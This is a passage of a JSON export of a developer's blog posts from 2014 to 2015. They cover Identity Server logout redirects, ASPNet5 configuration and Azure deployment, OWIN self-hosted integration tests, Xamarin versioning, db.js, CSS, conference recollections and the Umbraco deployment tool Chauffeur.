"2015-01-15-authentication-on-react-components" }, { "title": "Authomatic redirection when logging out of a Thinktecture Identity Server", "url": "https://www.aaron-powell.com/posts/2015-01-11-auto-redirect-when-logging-out/", "date": "Sun, 11 Jan 2015 00:00:00 +0000", "tags": [ "thinktecture" ], "description": "When using the Thinktecture Identity Server you might want to do an automatic redirect upon logout, which doesn't happen OOTB, so here's how to do it.", "content": "I’ve been working with the Thinktecture Identity Server v3 recently on a project. If you haven’t come across Thinktecture Identity Server before it’s an OpenID/OAuth2 server which you can run stand alone or embed in your own application to then do OAuth2 login against any credential store. It’s generic enough that you can plug in whatever underlying store you want and really powerful as to what it gives you. If you’re wanting to have your own auth server I can’t recommend this highly enough.\nRecently on the project we added something that you kind of want from an authenticated site, the ability to log out. Unsurprisingly Identity Server gives you the ability to log out, you redirect the user to the appropriate end point, the authorisation server performs the logout and then you are presented with a screen that says “Thanks for logging out, click here to go back to your site”.\nThis is less that ideal for my scenario, I don’t want the double-step, I want people to be returned to where they came from (actually I return them to another page which clears the client state in our SPA, but really I just don’t want them to see a “Thanks for logging out” screen).\nCustomising the Login/Logout processWith this requirement in mind it was time to dig into the Thinktecture API and work out where that page come from. What is interesting to note is that the whole login/logout process is served without any on-disk files and looking into the API I found that this is not entirely true, there are some on-disk files that get compiled as embedded resources and then served out by the DefaultViewService which is a class that has a method for each step of the login and logout process. The implementation then reads the files from the embedded resources and sends the stream back (which is then passed to the response stream).\nThis is where we need to hook in to do our different logout process and you can either implement the IViewService interface yourself or override the particular methods you need to override on the DefaultViewService. The latter is what I’ve chosen to do as I only want a different logout flow.\nEnforcing redirectThe one problem I noticed with the way which this all works is that because I don’t want anything served, I just want to do a redirect, I have a bit of a problem, I only have a Stream which I can return from the method (and digging further you’ll find that the Stream is passed as straight to the response which has a ContentType of text/html), not an actual response.\nSo how do we enforce the redirect? Well it’s time to get back to basics with HTML and play with the Meta Refresh in HTML. If you haven’t used the <meta http-equiv="refresh"> tag before it can be a nifty trick if you want to either reload a page after a period of time or redirect a browser after a time period. And that sounds exactly like what I want to do.\nGenerating the appropriate responseRight let’s recap:\nWe need to override the Logout method of the IViewService Generate a chunk of HTML with the appropriate meta tag And all that is pretty simple, in fact it’s less that 20 lines of code:\npublic override Task<Stream> LoggedOut(LoggedOutViewModel model) { var content = @"<!DOCTYPE html> <html> <head> <meta http-equiv='refresh' content='0;{0}'> </head> <body></body> </html>"; var formattedContent = string.Format(content, model.RedirectUrl); return Task.FromResult(formattedContent.ToStream()); } Note: the ToStream method is an extension method which you’ll find in the Thinktecture.IdentityServer.Core.Extensions namespace, but feel free to write your own string-to-Stream method if you must.\nTold you it was simple code. Because we want an immediate redirect I’ve set the meta-redirect to be 0 seconds, resulting in immediate redirection and really, that’s all that is important.\nConclusionWrapping up this post:\nThinktecture Identity Server is awesome. If you want your own Identity Server I’d use this over anything else There’s a great amount of abstraction built in, swapping parts is so easy Doing an immediate redirect is a matter over overriding one method, returning 7 lines of HTML ", "id": "2015-01-11-auto-redirect-when-logging-out" }, { "title": "Reading Azure config in ASPNet5", "url": "https://www.aaron-powell.com/posts/2015-01-03-reading-azure-config-in-aspnet5/", "date": "Sat, 03 Jan 2015 00:00:00 +0000", "tags": [ "aspnet", "aspnet5" ], "description": "There's a new config system in ASPNet5, so when you use an Azure Website how can you read the values stored in the Azure config?", "content": "In my rush to make the awesome website What the Commit? live I completely forgot that I’d committed the GitHub private key to the git repository. Whoops!\nSorry I have since reset the keys so no, you can’t use them :P.\nIn ASPNet5 there’s no dependency on IIS which in turn means there’s no Web.config. This poses an interesting question of where you get your configuration values from and how would you do different values per environment (aka, config transforms). If you’re not familiar with the the new configuration system check out this blog.\nOn Azure WebsitesWhen using Azure Websites if you go to the Configure section towards the bottom there is app settings. Here you can define settings that will be loaded up by your application when it starts.\nSince we’ve got a completely new config pipeline how would we access them?\nI decided to poke around in the loaded configs, which turns out to be a bit harder as it’s so abstract (I created some sample code for those interested) and what I learnt was they are available as Environment Variables.\nLoading Environment VariablesIf you want to use Environment Variables as a config source you need to make sure you load it, here’s what I did for my sample:\npublic class Startup { public Startup(IHostingEnvironment env) { // Setup configuration sources. Configuration = new Configuration() .AddJsonFile("config.json") .AddEnvironmentVariables(); } Here I’m defining two configuration sources. First is a JSON file which contains configuration options I’m unlikely to change per environment, maybe the number of results per page. Secondly I add the Environment Variables source, meaning that anything I’ve defined in there trumps what I have defined in the JSON file.\nConclusionIf you’re using Azure Websites and want to have different settings or load in sensitive settings then they are available as Environment Variables, which can be accessed in an ASPNet5 app using the appropriate configuration source.\n", "id": "2015-01-03-reading-azure-config-in-aspnet5" }, { "title": "Running grunt tasks when deploying ASPNet5 apps to Azure", "url": "https://www.aaron-powell.com/posts/2015-01-02-running-grunt-tasks-when-deploying-aspnet5-apps/", "date": "Fri, 02 Jan 2015 00:00:00 +0000", "tags": [ "aspnet", "aspnet5", "grunt", "gulp" ], "description": "How to run grunt (or gulp) tasks when deploying ASPNet5 applications to Azure Websites.", "content": "After MVP Summit this year the ASPNet team held a hack-day where we were encouraged to build something using ASPNet5 to help test out the platform. During that time I decided to build a website for when you can’t think up your own commit message, instead it’ll grab the last 50 commit messages from a GitHub using GitHub search called What the Commit.\nI finally decided to throw it up GitHub and deploy it to Azure. Since the app is a SPA I went down the route of using grunt and bower to manage the client side dependencies and build process (which is the recommended approach in ASPNet5 too).\nNaturally I don’t want to add all my node modules or bower components to the git repo, instead I’ll want to restore them before build, just like I do with my NuGet dependencies.\nWell how do you go about doing that?\nProject scriptsPart of the project.json is a scripts section which allows you to run arbitrary commands at various stages of the pipeline.\nFor restoring any packages from npm I find the most logical event to hook into is postrestore, which I believe runs when the NuGet packages have been restored, so you’re done with the .NET restore, now to the Node restore.\nNext you’ll need to run your grunt task(s) (or gulp if you’re using that) and to do that I went with the postbuild event as I’m running my client-side build process (which for me is doing little more than restoring some bower packages).\nAll completed my scripts property looks like this:\n"scripts": { "postrestore": [ "npm install" ], "postbuild": [ "grunt default" ] } First I run npm install to get the Node dependencies down, then I run grunt default which will restore my bower components, but could also do things like transpile, combine, minify, etc your scripts.\nWatch your path lengthsAnyone who has done Node development on Windows will have hit the fun “path exceeds 260 characters” and you can hit this on Azure too with ASPNet5 applications because you’re using Node for client builds. The reason for this is that a deployment happens into a temp folder before copying it over to the hosting folder. This is when you’ll hit your path length error, but you know you probably don’t have any need to have your node_modules folder (or bower_components for that matter) in your production instance and to avoid this you want to work with another part of the package.json file, packExclude.\nThe packExclude property allows you to specify files and folders which you don’t want included when the app is packaged for deployment (or packaged for other reasons), so you’ll probably want it looking something like this:\n"packExclude": [ "bower.json", "package.json", "gruntfile.js", "bower_components/**/*.*", "node_modules/**/*.*", "grunt/**/*.*", "**.kproj", "**.user", "**.vspscc" ] Now when Azure copies your app around it won’t copy the files you have no need for on a production instance.\nConclusionWhen deploying an ASPNet5 app to Azure (and likely any other hosting platforms) hooking into the events is the best way to combine the .NET and client build process.\nAlso make sure that you exclude from the package anything you wouldn’t want on the production instance.\n", "id": "2015-01-02-running-grunt-tasks-when-deploying-aspnet5-apps" }, { "title": "A consultants approach to painting", "url": "https://www.aaron-powell.com/posts/2015-01-01-a-consultant-approach-to-painting/", "date": "Thu, 01 Jan 2015 00:00:00 +0000", "tags": [ "random" ], "description": "I recently did some painting of our house and here's how to approach it like an IT consultant.", "content": "A few months ago my PO, aka wife, pitched a new project, painting our lounge room. She decided to go to market and find the right people to do the project. Since it’s my home too I decided to respond to the RFP as c’mon, how hard can painting a room really be?\nAfter a couple of different quotes came in I managed to win the work, being the cheapest option (the whole free labor thing won out) but there was a condition, as I don’t have much practical experience I would start with a PoC, painting my study. Based on the outcome of the PoC I might be given the rest of the project.\nYou won the work, now what?Since I’ve now won the work I actually have to do it. The problem is that I don’t really have any painting experience (well except that finger painting I did for my parents in high school). Sure I’ve got theoretical experience and I’ve watched those renovation shows but I’ve never actually painted a room and being a good consultant nothing is beyond me, I can adapt on the fly.\nThe first step though was to approach my PO about scaling up the team from 1 to 2 people and bring in someone with more experience, my father. The PO agreed and I organised for my parents to stay after Christmas so undertake the project.\nD-DayOn Boxing Day we’re at our house after again consuming way too much food and while the project doesn’t actually kick off until the next day we decided to do some preliminary analysis of the work required. We started by stripping the paint off the door frame. After a few hours at this and uncovering that there was a least 5 different colour layers in the paint we approached the PO to renegotiate the project, it wouldn’t be feasible to strip all the skirting boards as well as paint the room. But this is the advantage of an agile project, we were able to identify a problem early and change to reduce risk to the overall project.\nThe next morning we went out to pick up the supplies that we needed, paints for the various colours that the PO wanted and set to patching a part of the celling which we’d had repaired by not repainted.\nTo paint the study we would need to move some of the bookshelves away from the wall but we also decided that we’d add some more storage by stacking them. Well good thing that we did the ‘measure twice, cut once’ approach as we found out that our roof was ~5cm lower than we’d thought so we wouldn’t be able to stack the shelves. We presented this finding to our PO and that we’d need a new plan on how to increase the storage within the room. Through some discussions of the requirements we came up with a new plan, the shelves would move to a different wall and use up some whitespace in the room then we could put cupboards on the wall the shelves were originally on.\nSo we start painting the wall, paint over the patched roof and all goes swimmingly. In fact, the patched roof turned out a lot better than expected. Originally we planned to paint the whole roof but after a few coats over the patch it blended in perfectly meaning we wouldn’t need to do the whole roof. We present our findings to the PO during the demo that evening and talked about the fact that we were running ahead of schedule and planned to increase the backlog and actually do the lounge room.\nFighting scope creepWe’re moving fast through the backlog, we’d achieved our goal with the PoC (to prove we could paint a wall to the required level) and got further through the PoC than we’d expected on the first day and expaded our scope to cover the lounge room and hallway.\nBut like a true PO they started pushing for more, to paint our spare bedroom. This was going to really push the amount we’d commetted on in the allocated budget. We had to manage expectations, pointing out that we’d need to be doing three coats on the lounge and hallway, two on the feature panel and remounting all the pictures. When our PO realised that we’d be sacrificing quality for quantity the spare bedroom request was dropped.\nFinishing the projectAt about 8pm on New Years Eve I put the final coat of paint on the door frame, coming in just before the deadline of end of 2014 to finish the painting. There’s a few bugs that need to be fixed up later (a couple of places where the feature colour might have bleed dispite my tape effort) but they are in the backlog to be addressed when there is more time budgeted.\nTake awaysSomething that is always worth to remember is just how important it is to communicate. Approach your PO early when you find roadblocks or need to increase scope. The more visibility you have on a project the faster you can react to scope changes and even increase scope if needed.\nThe other take away? I don’t think I’ll be on any home renovation shows any time soon.\n", "id": "2015-01-01-a-consultant-approach-to-painting" }, { "title": "Hosting multiple WebAPI servers in a single process", "url": "https://www.aaron-powell.com/posts/2014-12-04-multiple-webapi-single-process/", "date": "Thu, 04 Dec 2014 00:00:00 +0000", "tags": [ "owin", "katana", "webapi", "testing" ], "description": "Have you ever wondered how you would go about hosting multiple WebAPI servers within a single process?", "content": "I’m currently working on a project which consists of three different ASP.Net applications that comunication in sequence, Server to Server to Server (to database if you want to get technical).\nBecause the communication channel is a little tricky we want to include some integration tests in the CI process to verify the them but this obviously means we need to have our servers up and running. This is a bit of a pain, having to either run all our sites in IIS, which means that Visual Studio needs to be run as an administrator. Alternatively we can use IIS Express, sure we’re no longer requiring VS as admin but now our tests will fail locally unless we’re running IIS Express. That’s not a deal breaker but it’s a bit of an overhead that’d lead to random test fails.\nWell conveniently we’re using WebAPI2 controllers to communicate across each server which leaves us with another option - self hosting. Well that could be an interesting option, we could spin up the servers using the OWIN self hosting inside the integration test. Yeah, let’s do that!\nMicrosoft.Owin.TestServerMy first thought was to use this test helper which Microsoft provides. In fact I’ve used it in the past for integration testing WebAPI but I’ve never tried to run two of them in the same process.\nI fired it up and what do you know it didn’t work. So I started digging through the source to try and work out what it does and how it does it. As it turns out this helper creates a server which doesn’t actually run over the networking stack, everything is done in memory and this is going to be a problem, with no networking stack how are you meant to make a HttpClient call from one server to the other? Also this is all in a single process, that could just be a problem…\nAlright, let’s scratch this as an option.\nMicrosoft.Owin.SelfHostOn to our next option, using the normal Self Host framework and we’ll sit that on top of HttpListener. This means we can run separate servers on seperate endpoints, making it easier to do things that need networking, like calling on HttpClient.\nSetting up a Self Host isn’t too hard, so I added to the test class constructor a call to startup both servers.\npublic class MyTestClass : IDisposable { private readonly IDisposable serverA; private readonly IDisposable serverB; public MyTestClass() { serverA = WebApp.Startup("http://localhost:90", app => { var startup = new ServerA.Startup(); startup.Configuration(app); }); serverB = WebApp.Startup("http://localhost:91", app => { var startup = new ServerB.Startup(); startup.Configuration(app); }); } [Fact] public void ServerA_can_talk_to_ServerB() { var client = new HttpClient(); var result = client.GetAsync("http;//localhost:90/api/echo").Result; result.StatusCode.ShouldBe(HttpStatusCode.OK); } public void Dispose() { serverA.Dispose(); serverB.Dispose(); } } Fantastic, that should do exactly what we want right? We’ve got two servers, separate ports, etc. Well crap there’s a problem, I have EchoController in both of my servers and this is resulting in a 500 error saying that WebAPI doesn’t know whether to use ServerA.Controllers.EchoController or ServerB.Controllers.EchoController.\nWait… what? Why is ServerA getting access to all of the controllers in ServerB? That doesn’t seem right now does it? And I didn’t setup my configurations to do that. The only logical conclusion is that it’s an issue with the AppDomain, so I did some more digging.\nIAssembliesResolver Chatting to some of the folks in the JabbR OWIN room I was pointed towards this interface, in a WebAPI project it is what does the resolution of the controllers. It’s normally running as the DefaultAssembliesResolver class and it returns the list of assemblies from the current AppDomain. Well then I guess we have our answer, we are getting cross-AppDomain issues. Well then, what’s the solution? Let’s create our own implementation of IAssembliesResolver:\npublic class IntegrationTestAssembliesResolver : IAssembliesResolver { public ICollection<Assembly> GetAssemblies() { return new[] { this.GetType().Assembly }; } } That’s easy enough, so how do we use it? Well we have to shoehorn it into our WebAPI pipeline when the test server boots up. I’m doing this by adding it to part of the Startup class but I only want it when we’re running WebAPI in a self-host, or more importantly when it’s running in a test. To do that I’ll tell my OWIN apps that it’s running in a test:\npublic MyTestClass() { serverA = WebApp.Startup("http://localhost:90", app => { app.Properties.Add("TestServer", true); var startup = new ServerA.Startup(); startup.Configuration(app); }); serverB = WebApp.Startup("http://localhost:91", app => { app.Properties.Add("TestServer", true); var startup = new ServerB.Startup(); startup.Configuration(app); }); } Now to update our Startup:\npublic class Startup { public void Configuration(IAppBuilder app) { var config = new HttpConfiguration(); if (app.Properties.ContainsKey("TestServer")) { var ar = new IntegrationTestAssembliesResolver(); config.Services.Replace(typeof(System.Web.Http.Dispatcher.IAssembliesResolver), ar); } WebApiConfig.Register(config); } } Put that into both of our Startup classes and there we go!\nConclusionThere we have it, it all boils down to setting the IAssembliesResolver to only work within its own assembly scope you can run as many OWIN servers in a single process on as many endpoints as you want.\n", "id": "2014-12-04-multiple-webapi-single-process" }, { "title": "Versioning Xamarin Android apps", "url": "https://www.aaron-powell.com/posts/2014-09-22-versioning-xamarin-android-apps/", "date": "Fri, 26 Sep 2014 00:00:00 +0000", "tags": [ "xamarin" ], "description": "When creating Xamarin apps from a CI process like TeamCity it can be useful to generate the version accordingly.", "content": "I’m currently working on a Xamarin application with an Android target. We have setup a CI environment using TeamCity as Xamarin describes but what we wanted to do was create an app version accordingly so when we push a CI build you know there’s an update and which build it is from.\nSo I decided to do some investigation into how Android applications are versioned and what I found is:\nThere is an AndroidManifest.xml This has a versionName attribute in the XML which represents the application version There is a versionCode attribute in the XML which represents an interal application code Sweet, XML is pretty easy to modify, now how can we modify it so that when we run MSBuild over the Android csproj file?\nConveniently Jason Stangroome had previously given me a MSBuild task for updating the AssemblyInfo with a version number that you provide. Well I’m not needing to update the AssemblyInfo, instead I want to update the AndroidManifest, so I just modified the code to instead of writing a *.cs file to manipulate XML, using C#.\nNext challenge - I didn’t want to override the AndroidManifest.xml as that has a problem of file locking (I’m opening it to read the XML so it’s locked) and anyway I don’t want to update it as it’d be useful to see the new file if/when I need in the build output. So that begs the question, how do I get the Xamarin transpiler to understand that there is a different AndroidManifest.xml I want it to use?\nWell, if you poke into the Android project’s csproj file you’ll come across this:\n<AndroidManifest>Properties\\AndroidManifest.xml</AndroidManifest> Right, so now I have two choices, I can either update that file path or provide a replacement AndroidManifest property in MSBuild. It turns out that the latter was just as easy as the Xamarin Android engine really only cares about the last AndroidManifest that it finds.\nFinally there’s the question of “when the do I run my MSBuild task?” and that was a bit tricky to work out. For that I needed to have a look when the AndroidManifest is loaded up so I can run before that target runs. A bit of MSBuild verbose logging later I narrowed it down to _ValidateAndroidPackageProperties, which loads up the manifest, parses it for validity and continues on. With this knowledge we can add a BeforeTargets="_ValidateAndroidPackageProperties" to our target and we’re done.\nConclusionWith a bit of XML manipulation it’s pretty easy to customise the application version of a Xamarin Android application. I’ve created a NuGet package if anyone would like to use it, just:\nPM> Install-Package Readify.Xamarin.MSBuild.Android And pass in the argument:\nmsbuild MyAndroidApp.csproj /t:SignAndroidPackage /p:AppVersion=1.0.0.1 ", "id": "2014-09-22-versioning-xamarin-android-apps" }, { "title": "Add or update with db.js", "url": "https://www.aaron-powell.com/posts/2014-09-11-add-or-update-dbjs/", "date": "Thu, 11 Sep 2014 00:00:00 +0000", "tags": [ "db.js", "indexeddb" ], "description": "A common question with db.js is how to merge data from a remote store into the local store. When doing so you need to think about how you're handling an add vs an update statement.", "content": "A common question with db.js is how to merge data from a remote store into the local store. When doing so you need to think about how you’re handling an add vs an update statement.\nSay you have some records that you’re syncing between the two instances and they have a common key that you use to identify on both the client and the server. When a user hits the site you pull down the records and want to work out if they are to be inserted or just updated against what you already have.\nWell db.js exposes two methods, add and update which take an item and well, do what it sounds like. But this can make your code seem a bit confusing, do you need to perform a get first and find out if the record exists, and if it does then do an update otherwise do an add? That’d make it quite intensive a process as you have two operations for every record.\nI decided to crack open the IndexedDB spec and do some digging to see if I could work out the best way to go about this. The logical starting place for this is with the Object Store Storage Operation for you see there are two methods for adding items into an IndexedDB store, there is the add method and there is the put method.\nSo what’s the difference between the two? Well it comes down to point #4 of the Object Store Storage Operation:\nIf the no-overwrite flag was passed to these steps and is set, and a record already exists in store with its key equal to key, then this operation failed with a ConstraintError. Abort this algorithm without taking any further steps.\nThe difference is that add sets the no-overwrite flag to true where as put sets it to false, meaning that if you provide a “new” item to put it will perform an insert on the record.\nNow let’s get back to db.js, how does this fit into the picture? Well with db.js I don’t have a put method (at least not as of today), instead put is what the update method uses.\nTakeaway lessonIf you want to perform an add-or-update but don’t want to go through the overhead of doing a check if the record exists then you can just call the update method on your db.js store. Although it probably makes sense to rename the update method to put so it’s more consistent with the IndexedDB API, maybe I’ll just backlog that one.\n", "id": "2014-09-11-add-or-update-dbjs" }, { "title": "A simple expanding list in CSS only", "url": "https://www.aaron-powell.com/posts/2014-08-21-simple-expanding-list/", "date": "Thu, 21 Aug 2014 00:00:00 +0000", "tags": [ "css" ], "description": "Here's a simple approach to creating an expanding list with CSS.", "content": "Recently I was working on a site that needed to have an expanding list of items, the list is quite long but we wanted part of it hidden until the user clicks an option to expand it fully.\nI was thinking about how I’d done this in the past and what would be the simplest way to do it. Normally I’d just whip out a bit of JavaScript, find the ul, find any li’s beyond the count limiter and hide them and when the user clicks the button it’ll make them visible.\nThen it hit me, there’s a really simple way to hide the items with just CSS… nth-child.\nI’ve never really used nth-child in development, except for things like alternating rows, but you can leverage the maths capabilities to do something like this:\nul.hidden li:nth-child(n+10) { display: none; } And you’re done! Seriously, it’s that simple to hide items at a position greater than 10 in the list!\nThe way this works is that it leverages the positional nature of the nth-child’s n value, which represents the index of the item in the selector is matching. By providing a +10 to it we offset the position that the current pass matches, hiding it, so:\nFirst item - 0 + 10 -> match the 10th item Second item - 1 + 10 -> match the 11th item Eleventh item - 11 + 10 -> match the 21st item And there we have it, using the nth-child we can easily manipulate the elements with CSS as a while, rather than individually by explicitly finding each item.\nCheck out my demo to see it in action.\n", "id": "2014-08-21-simple-expanding-list" }, { "title": "5 years of DDD Melbourne", "url": "https://www.aaron-powell.com/posts/2014-07-22-5-years-of-dddmelb/", "date": "Tue, 22 Jul 2014 00:00:00 +0000", "tags": [ "dddmelb", "musing" ], "description": "A look back at the 5 years that has been DDD Melbourne", "content": "Last weekend saw me attending DDD Melbourne for the 5th year running and it also was the 5th year that I was attending as a speaker. I feel pretty honered to have been there all 5 years as a speaker, especially since it’s a community-voted event. The team even got me a new laptop bag, although I’m not sure what they are implying with the slogan :P\nI want to have a bit of a look back at my time.\nIn the beginningThe first DDD Melbourne was back in 2010 and at the time I was a reasonably unknown developer working for an agency in Sydney and having only recently moved from Melbourne to Sydney. Also I wasn’t really much of a conference person then either, I’d only been to one in the past. I was following a bunch of Readify developers on twitter at the time and they all started tweeting about DDD Melbourne, submitting talks, etc. So on a Friday after a few beers I decided “sure, I can totally present at a conference”, so I sat down and wrote an abstract, submitted it and waited to see.\nEvidently I bribed enough people, err, made an exciting enough a proposal and it got voted in.\nWell shit, that meant I actually had to write the talk and get up in front of people to talk. At the time I was a pretty shy guy, and while it seemed like a good idea at the time in the sober light of day the idea of being up in front of people speaking was nerveracking.\nBut I knew my material (it was an introduction to Umbraco) and people had voted for me to be there so if I could fake confidence well then I’d probably make it.\nWhat really surprised me was just how friendly everyone was. There was a bunch of people I’d only ever chatted to on twitter there. By the time I’d got to presenting I’d basically forgotten I was surrounded by people who were “strangers”, I was there with a bunch of mates who were there to heckle and be heckled (hmm… maybe that’s where my notoriety came from :P).\nMaking a returnIn 2011 I jumped at the chance to submit to DDD Melbourne, this time it was a JavaScript talk that I was doing and looking back I think it was my most risky talk to date. Rather than being a traditional talk where you have slides and stuff this was basically a pure coding session, exploring some fun things you can do with raw JavaScript. I still remember the rush of creating a pub/sub library front scratch in about 5 minutes and having people going “how the hell did you just whip that up?!”.\nI also learnt the peril that is live coding. Seriously, live coding for 1 hour is really hard work (for the record, I did have notes on another device, but still I had to at least transcribe everything).\nWhat I learnt about flaky internetWhen I came back in 2012 I brought a talk that taught me another valuable lesson about relying on the internet during a talk. This talk was adaptation of a lightning talk I’d given about doing everything in the browser, from coding to debugging, tests, CI and deployment. With a combination of Cloud9, GitHub, Travis-CI and Heroku I had a Node.js application that I was deving, testing and deploying. But with a 3g connection as my only bandwidth and being inside a lecture hall it wasn’t helping my cause.\nBut through the good natured audience that you get at DDD Melbourne, some good quality heckling and deliberately over the top hipster take on the concept meant that people saw the talk as as how it was meant to be seen, a look at things to come.\nIt’s kind of funny thinking back to that talk and realising that now it’s not such a bizzar idea in the .NET space through VSO and Azure!\nReverse heckling the keynote speakerLast year for my 4th talk I was doing a more deep-dive coding talk and back to my roots with a JavaScript talk. This time though it was more of a pre-canned set of examples rather than doing everything on-the-fly.\nExcept one thing. Last year’s keynote was given by Joe Albahari, the author of LINQPad, and in his talk about parallel processing there was a code snippet he showed on how to generate prime numbers using LINQ. Well part of my talk was on an idea that I’d been playing with, creating LINQ in JavaScript using ES6 generators.\nSo not to be out done during the keynote I quickly whipped up the same code in JavaScript! As fate would have it Joe was in my talk and I was like “Oh here’s Joe’s keynote snippet in JavaScript”, to which he countered “Can you make it run in parallel?”. Well no, JavaScript is single threaded, but he’d seen through my heckle (although I have worked out a way that involved generating web workers on the fly and such).\nThe year that wasAnd this leads up back to 2014 and my 5th talk. It was a bit of a departure from my usual this year, I went down the route of a less technical, more philosophical talk this time, exploring the concept that there are no bad ideas so long as you learn something. I used a few examples of “bad ideas” that I’ve developed recently.\nThis was a lot of fun a talk to give and present, there’s nothing better than talking about learning and encouraging other people to not be scared to tackle something they’ve always thought would be just a bad idea if they think they can learn something from it.\nConclusionWhat a journey it’s been, from a guy who was freaking out about getting up in front of an auidence to someone who can’t wait until next year and is already planning their talk submissions. DDD Melbourne has to be one of my favorite conferences out there. A big thanks to the team behind it for each year they out do the last one. An equally big thanks to the community who keeps having faith to bring me back each year.\nHere’s to another 5 years!\n", "id": "2014-07-22-5-years-of-dddmelb" }, { "title": "Introducing Chauffeur", "url": "https://www.aaron-powell.com/posts/2014-06-09-introducing-chauffeur/", "date": "Mon, 09 Jun 2014 00:00:00 +0000", "tags": [ "umbraco", "chauffeur", "deployment" ], "description": "Introducing Chauffeur, a new classy way to delivery changes around Umbraco instances.", "content": "Over the last few months I’ve been tweeting out information about a new Open Source project for Umbraco I’ve been working on called Chauffeur. In this post I want to introduce you to what Chauffeur is and what it can do for you and your Umbraco projects.\nElevator pitchDeployment is hard, getting changes from one environment with Umbraco has never been an easy problem to solve. Need to add a new Document Type then you end up with manual steps in the web UI, parsing files on first request and compare to the database, backup/restore or a combination of any of these.\nBut really these ‘structural items’ (Document Types, Data Types, Templates, Macros, etc) are the kinds of things that are a deployment step, until they are done you can’t really say that the new iteration of the site is ready.\nChauffeur comes at this problem from a different angle, to remove the human element from deployments. Be it deploying changed from one developers machine to another or from staging to production.\nYou should be able to automate these changes with repeatable scripts that can be run before the website comes up.\nBasically Chauffeur is a console application which you can run without having to start IIS to interact with Umbraco instances. So remove the human factor from doing your deployments. Make it simple, make it automated and make it repeatable.\nScreen Cast Because a picture paints 1000 words I decided to also do a simple screencast of Chauffeur, check it out, then continue reading to get a fuller picture.\nHello ChauffeurAt its core Chauffeur is a .NET host for Deliverables, which are something for Chauffeur do. This host can be hosted anywhere but the primary host is a console application, Chauffeur.Runner.exe. The executable is then run from inside the bin folder of your Umbraco instance so it can load up the whole Umbraco API.\nSo like I said you have Deliverables and this is something that Chaffer does it could be:\nInstalling the Umbraco database Import Data Types/Document Types/etc Provide information about the Document Types in your instance Chauffeur.Runner When you want to use Chauffeur you start it up with the Chauffeur.Runner.exe, this console application gives you a simple command prompt:\nFrom here you can execute a Deliverable, in this case I’ve used help:\nSo from help you can see all the Deliverables that are available, you can write your own too! In fact Chauffeur uses the same TypeFinder that Umbraco itself uses so discovery is done like in Umbraco itself.\nDeliverables The core of everything is the Deliverable and everything in Chauffeur is a Deliverable, including the Help system and quit!\nWhat a Deliverable does is entirely up to the author of it, you’ve got access to the Umbraco API’s… within reason, you won’t have anything that depends on HttpContext because well… it’s a console application! You can access the Umbraco API’s via constructor injection as Chauffeur has its own IoC container.\nA Deliverable has a name and option aliases. The name is the primary way you call it and it’s expected to be unique. Aliases are more like fall backs, only if a name isn’t found for what you typed in will Chauffeur look for an alias.\nLet’s say we use the install deliverable, it’d go like this:\nFirst of Chauffeur looked for a connection string (no connection string, it won’t work) and then at the provider. In the sample above I’ve used SQLCE and I didn’t have a sdf file on disk so Chauffeur has prompted to create one (if you’re not using SQLCE you’ll need to have the DB already on the server, or create a Deliverable to do that :P) and then it goes aheaad and runs all the Umbraco database scripts to create you an empty database. All of this is done via a console application so you didn’t need to start IIS to achieve it!\nDeliveriesOne of the goals of Chauffeur was the be automated so while being able to fire up a console application and type commands into it that’s not particularly automated so for that you can do one of two things:\nYou can pass the name of the Deliverable via the CLI Use the delivery command The Delivery This is a unique Deliverable in that it doesn’t do anything against Umbraco directly, instead you create a Delivery file which is a series of Deliverables to be executed, like so:\n## 001-install.delivery install y user change-password 0 default my-secret-password package DataTypes package DocumentTypes package Macros So this delivery will install Umbraco (and the y flag will be passed to the prompt to create a SQLCE file) then update the user password then import a series of Data Types, Document Types and Macros.\nWhen running the delivery Deliverable:\numbraco> delivery It will do a scan of the Chauffeur directory (App_Data\\Chauffeur) for all *.delivery files, order them by their name (which is why I’ve used a numerical prefix) and then execute each Deliverable one-by-one.\nOnce it completes it then tracks that the delivery has been run and it won’t run it again, so if you keep using delivery one an environment it won’t try and delivery deliveries that have previously been delivered!\nThe idea is that you check all your *.delivery files into source control (maybe do something smarter around the user password though…) so you can then get everything from source control and easily setup the whole environment without the need for database backup/restore processes.\nGetting ChauffeurChauffeur is currently only available as a set of NuGet packages, the Chauffeur and Chauffeur.Runner are separate so if you want to write your own Deliverables you don’t need the exe.\nChauffeur also requires you to be using Umbraco 7.1.1 because there have been a few bug fixes and more importantly the new Membership API.\nYou can also get the latest build via the NuGet feed from our build server.\nFinally this is an Open Source project and you can find it on GitHub including more documentation.\nConclusionI’m really excited by Chauffeur and the idea of doing automation of deployments with Umbraco in a way which doesn’t require user interaction.\n", "id": "2014-06-09-introducing-chauffeur" }, { "title": "F12 Refresh - CSS editor", "url": "https://www.aaron-powell.com/posts/2014-04-03-f12-refresh-css-editor/", "date": "Thu, 03 Apr 2014 00:00:00 +0000", "tags": [ "css", "f12", "internet-explorer" ], "description": "A look at the CSS editor improvements in the F12 tooling refresh", "content": "One of the new features in the F12 refresh is some updates to the CSS editor so let’s have a look at those updates.\nTracking what changedAs a web developer often I’m spending time in the browser on the dev tools tweaking the CSS of the page to try out changes to the CSS without having to reload the page. The main pain with all of this is that if you’re making lots of changes across multiple elements it’s easy to lose track of what you changed.\nWith the F12 refresh we now get some visual indicators in the Styles tab which will highlight different colours depending on what you’ve done; if you’ve changed a setting then it’ll have an orange highlight next to it, removed properties (actually deleted, not just unchecked) will be highlighted with red and new properties will be highlighted green. Here is it in action:\nThat’s all well and good but when you’re doing changes across multiple DOM elements it can be a bit tricky still, as the style list still only shows you what is the change of the current DOM element, and selectors relevant to it. To combat this the F12 team have added a new tab to the CSS panel called Changes. This new panel does an inline diff of all the changes across all stylesheets within your web application. The changes also have the line number where the selector starts which you can also click in and navigate into the file within F12. If you’ve created an inline rule that will be listed with the selector for the element. You can even create new rules and they’ll appear in the list as well. Here’s it in action:\nToggling statesThere are a few states of DOM elements that can be useful to style, the hover and visited states. The problem is that these states can be tricky to simulate, particularly hover, it’s kind of hard to hover an element and tweak it within the dev tools at the same time. With the F12 refresh we now have an option on the right which we can use to hide/show these pseudo states and toggle them on and off:\nNote: Changing theses pseudo states only toggles their visual state not the true element state meaning that it won’t trigger the events associated with them.\nConclusionThat wraps up our look at some of the new features related to the style editor in Internet Explorer’s F12 tools. If you’ve got any feedback make sure you ping the @IEDevChat twitter account and let them know. Also don’t forget to checkout modern.ie to get trial versions of Windows with Internet Explorer.\n", "id": "2014-04-03-f12-refresh-css-editor" }, { "title": "F12 Refresh - The JavaScript Console", "url": "https://www.aaron-powell.com/posts/2014-04-03-f12-refresh-the-javascript-console/", "date": "Thu, 